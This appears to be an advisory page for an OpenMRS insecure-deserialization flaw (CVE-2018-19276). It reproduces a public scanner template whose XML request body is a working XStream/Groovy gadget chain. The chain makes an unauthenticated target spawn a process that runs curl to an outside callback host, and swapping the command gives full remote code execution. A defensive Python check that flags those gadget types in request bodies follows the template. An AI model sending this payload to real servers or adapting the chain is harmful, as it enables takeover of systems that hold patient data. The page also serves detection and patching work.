CVE-2018-19276: OpenMRS Platform < 2.24.0 - Insecure Object Deserialization

Date: 2025-08-01 | Affected software: OpenMRS Platform | PoC: public

Vulnerability description

OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.

PoC code [public]

id: CVE-2018-19276

info:
  name: OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
  author: DhiyaneshDK
  severity: critical
  description: |
    OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
  reference:
    - http://packetstormsecurity.com/files/155691/OpenMRS-Java-Deserialization-Remote-Code-Execution.html
    - https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19276
    cwe-id: CWE-502
    epss-score: 0.91891
    epss-percentile: 0.99682
    cpe: cpe:2.3:a:openmrs:openmrs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: openmrs
    product: openmrs
    shodan-query: html:"OpenMRS"
  tags: cve,cve2018,openmrs,deserialization,rce

http:
  - raw:
      - |
        POST {{path}}/ws/rest/v1/xxxxxx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <map>
          <entry>
            <groovy.util.Expando>
              <expandoProperties>
                <entry>
                  <string>hashCode</string>
                  <org.codehaus.groovy.runtime.MethodClosure>
                    <delegate class="java.lang.ProcessBuilder">
                      <command>
                        <string>curl</string><string>{{interactsh-url}}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </delegate>
                    <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
                    <resolveStrategy>0</resolveStrategy>
                    <directive>0</directive>
                    <parameterTypes/>
                    <maximumNumberOfParameters>0</maximumNumberOfParameters>
                    <method>start</method>
                  </org.codehaus.groovy.runtime.MethodClosure>
                </entry>
              </expandoProperties>
            </groovy.util.Expando>
            <int>1337</int>
          </entry>
        </map>

    payloads:
      path:
        - ""
        - "/openmrs"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "message\":")'
        condition: and
# digest: 4b0a00483046022100fd7ee647c6c98089198d07d5e47a26af502958878d84a3b5899c9b7c1fc23af0022100c982a4737a52360a5cf39a8138be40ce8921935d0bb88c37c238173edf3c87d6:922c64590222798bb761d5b6d8e72950
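
A defender-side check for the XML request bodies this template sends, as an added example (not part of the template or of OpenMRS): it flags fully qualified Java type names that appear as element names or `class` attributes in a body, the way the template's payload references its types. The function name `inspect_xml_body`, the finding labels, and the allowlisted type `com.example.PatientNote` are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Type names that appear in the template's request body on this page.
GADGET_TYPES = {
    "groovy.util.Expando",
    "org.codehaus.groovy.runtime.MethodClosure",
    "java.lang.ProcessBuilder",
}
# Assumption: types this deployment legitimately accepts (constructed name).
ALLOWED_TYPES = {"com.example.PatientNote"}
# A fully qualified class name used as an element name or as a class="..."
# attribute is treated as a type reference; plain aliases have no dots.
TYPE_NAME = re.compile(r"^[A-Za-z_]\w*(\.[\w-]+)+$")


def inspect_xml_body(content_type, body):
    """Return sorted findings for one request body; an empty list means clean."""
    if "xml" not in content_type.lower():
        return []
    # Refuse DTDs outright so entity expansion never reaches the parser.
    if "<!doctype" in body.lower():
        return ["dtd-present"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed-xml"]
    findings = set()
    for element in root.iter():
        for name in (element.tag, element.get("class")):
            if not name or not TYPE_NAME.match(name):
                continue  # plain alias such as <map> or <string>
            if name in GADGET_TYPES:
                findings.add("gadget-type:" + name)
            elif name not in ALLOWED_TYPES:
                findings.add("unexpected-type:" + name)
    return sorted(findings)


# Constructed samples: the first reuses the template's type names in a reduced structure.
SAMPLE_FLAGGED = (
    "<map><entry><groovy.util.Expando><expandoProperties><entry>"
    "<string>hashCode</string><org.codehaus.groovy.runtime.MethodClosure>"
    '<delegate class="java.lang.ProcessBuilder"><command/></delegate>'
    "</org.codehaus.groovy.runtime.MethodClosure></entry></expandoProperties>"
    "</groovy.util.Expando><int>1</int></entry></map>"
)
SAMPLE_ALLOWED = "<com.example.PatientNote><text>follow-up</text></com.example.PatientNote>"

if __name__ == "__main__":
    for label, body in (("flagged", SAMPLE_FLAGGED), ("allowed", SAMPLE_ALLOWED)):
        print(label, inspect_xml_body("text/xml", body))
```

An allowlist of accepted types catches gadget classes that the fixed `GADGET_TYPES` set does not name, which is why unknown dotted names are reported as well.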